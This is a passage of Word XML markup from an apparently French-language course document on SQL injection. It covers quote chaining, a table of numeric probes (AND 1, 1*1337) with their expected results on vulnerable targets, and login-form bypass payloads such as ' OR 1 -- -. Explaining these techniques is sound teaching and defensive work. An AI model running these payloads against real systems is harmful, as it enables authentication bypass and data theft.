        <w:t xml:space="preserve"> :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00394801" w:rsidRPr="00CF0E97" w:rsidRDefault="00394801" w:rsidP="00B234F2">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF0E97">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT * FROM Table WHERE data = 'xxx''';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00394801" w:rsidRPr="00CF0E97" w:rsidRDefault="00394801" w:rsidP="00B234F2">
      <w:pPr>
        <w:pStyle w:val="PrformatHTML"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF0E97">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SELECT * FROM Table WHERE data = '1'''''''''''UNION SELECT '2';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00394801" w:rsidRPr="004F619F" w:rsidRDefault="00394801" w:rsidP="00B234F2">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F619F">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Remarques</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F619F">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00394801" w:rsidRPr="004F619F" w:rsidRDefault="00394801" w:rsidP="00E84239">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F619F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Il est possible d’utiliser autant d’apostrophe (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F619F">
        <w:rPr>
          <w:rStyle w:val="Accentuation"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>quote</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F619F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>) et de guillemet (</w:t>
      </w:r>
      <w:r w:rsidRPr="004F619F">
        <w:rPr>
          <w:rStyle w:val="Accentuation"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>double-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F619F">
        <w:rPr>
          <w:rStyle w:val="Accentuation"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>quote</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F619F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>) tant qu’ils vont par paire.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00394801" w:rsidRPr="004F619F" w:rsidRDefault="00394801" w:rsidP="00B234F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F619F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Une </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F619F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>quote</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F619F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> échappe une seconde </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F619F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>quote</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F619F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>, d’où le chaînage par paire.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00394801" w:rsidRPr="00394801" w:rsidRDefault="00394801" w:rsidP="00E84239">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="540"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00394801">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Injection par valeurs numériques</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00394801" w:rsidRPr="004F619F" w:rsidRDefault="00394801" w:rsidP="00E84239">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F619F">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Pour la requête suivante :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00394801" w:rsidRPr="00CF0E97" w:rsidRDefault="00394801" w:rsidP="00E84239">
      <w:pPr>
        <w:pStyle w:val="PrformatHTML"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF0E97">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SELECT * FROM Table WHERE data = [INJ];</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grilleclaire-Accent1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1263"/>
        <w:gridCol w:w="2929"/>
      </w:tblGrid>
      <w:tr w:rsidR="00394801" w:rsidRPr="00394801" w:rsidTr="00A44733">
        <w:trPr>
          <w:cnfStyle w:val="10000000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AND 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00394801" w:rsidRPr="00394801" w:rsidRDefault="00394801">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:cnfStyle w:val="10000000000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True</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00394801" w:rsidRPr="00394801" w:rsidTr="00A44733">
        <w:trPr>
          <w:cnfStyle w:val="00000010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AND 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00394801" w:rsidRPr="00394801" w:rsidRDefault="00394801">
            <w:pPr>
              <w:bidi w:val="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False</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00394801" w:rsidRPr="00394801" w:rsidTr="00A44733">
        <w:trPr>
          <w:cnfStyle w:val="00000001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AND true</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00394801" w:rsidRPr="00394801" w:rsidRDefault="00394801">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:cnfStyle w:val="00000001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True</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00394801" w:rsidRPr="00394801" w:rsidTr="00A44733">
        <w:trPr>
          <w:cnfStyle w:val="00000010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AND false</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00394801" w:rsidRPr="00394801" w:rsidRDefault="00394801">
            <w:pPr>
              <w:bidi w:val="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r w:rsidRPr="00394801">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>False</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00394801" w:rsidRPr="00394801" w:rsidTr="00A44733">
        <w:trPr>
          <w:cnfStyle w:val="00000001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1-false</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00394801" w:rsidRPr="00394801" w:rsidRDefault="00394801">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:cnfStyle w:val="000000010000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394801">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Retourne</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00394801">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00394801">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>si</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00394801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394801">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>vulnérable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00394801" w:rsidRPr="00394801" w:rsidTr="00A44733">
        <w:trPr>
          <w:cnfStyle w:val="00000010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1-true</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00394801" w:rsidRPr="00394801" w:rsidRDefault="00394801">
            <w:pPr>
              <w:bidi w:val="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394801">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Retourne</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00394801">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> 0 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00394801">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>si</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00394801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394801">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>vulnérable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00394801" w:rsidRPr="00394801" w:rsidTr="00A44733">
        <w:trPr>
          <w:cnfStyle w:val="000000010000"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00394801" w:rsidRPr="00394801" w:rsidRDefault="00394801">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00394801">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1*1337</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00394801" w:rsidRPr="00394801" w:rsidRDefault="00394801">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:cnfStyle w:val="000000010000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394801">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Retourne</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00394801">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1337 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00394801">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>si</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00394801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394801">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>vulnérable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A44733" w:rsidRDefault="003E4F3E" w:rsidP="00CF0E97">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:bidi w:val="0"/>
        <w:spacing w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Table</w:t>
      </w:r>
      <w:r w:rsidR="00A44733">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5.3 </w:t>
      </w:r>
      <w:r w:rsidR="00A44733" w:rsidRPr="00A44733">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Injection par valeurs numériques</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00652235" w:rsidRPr="004F619F" w:rsidRDefault="00652235" w:rsidP="00535FE8">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="540"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F619F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Injection dans un formulaire de connexion/login</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00652235" w:rsidRPr="004F619F" w:rsidRDefault="00652235" w:rsidP="00535FE8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F619F">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Pour la requête suivante :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00652235" w:rsidRPr="00CF0E97" w:rsidRDefault="00652235" w:rsidP="00535FE8">
      <w:pPr>
        <w:pStyle w:val="PrformatHTML"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF0E97">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF0E97">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF0E97">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF0E97">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF0E97">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> = '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF0E97">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF0E97">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF0E97">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF0E97">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> = '[INJ]';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00652235" w:rsidRPr="004F619F" w:rsidRDefault="00301CCB" w:rsidP="00535FE8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="004F619F">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>es i</w:t>
      </w:r>
      <w:r w:rsidR="00652235" w:rsidRPr="004F619F">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">njections </w:t>
      </w:r>
      <w:r w:rsidR="004F619F">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>sont</w:t>
      </w:r>
      <w:r w:rsidR="00652235" w:rsidRPr="004F619F">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00652235" w:rsidRPr="00CF0E97" w:rsidRDefault="00652235" w:rsidP="00535FE8">
      <w:pPr>
        <w:pStyle w:val="PrformatHTML"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF0E97">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>' OR 1 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00652235" w:rsidRPr="00312435" w:rsidRDefault="00652235" w:rsidP="00535FE8">
      <w:pPr>
        <w:pStyle w:val="PrformatHTML"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312435">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>' OR '' = '</w:t>
      </w:r>
    </w:p>
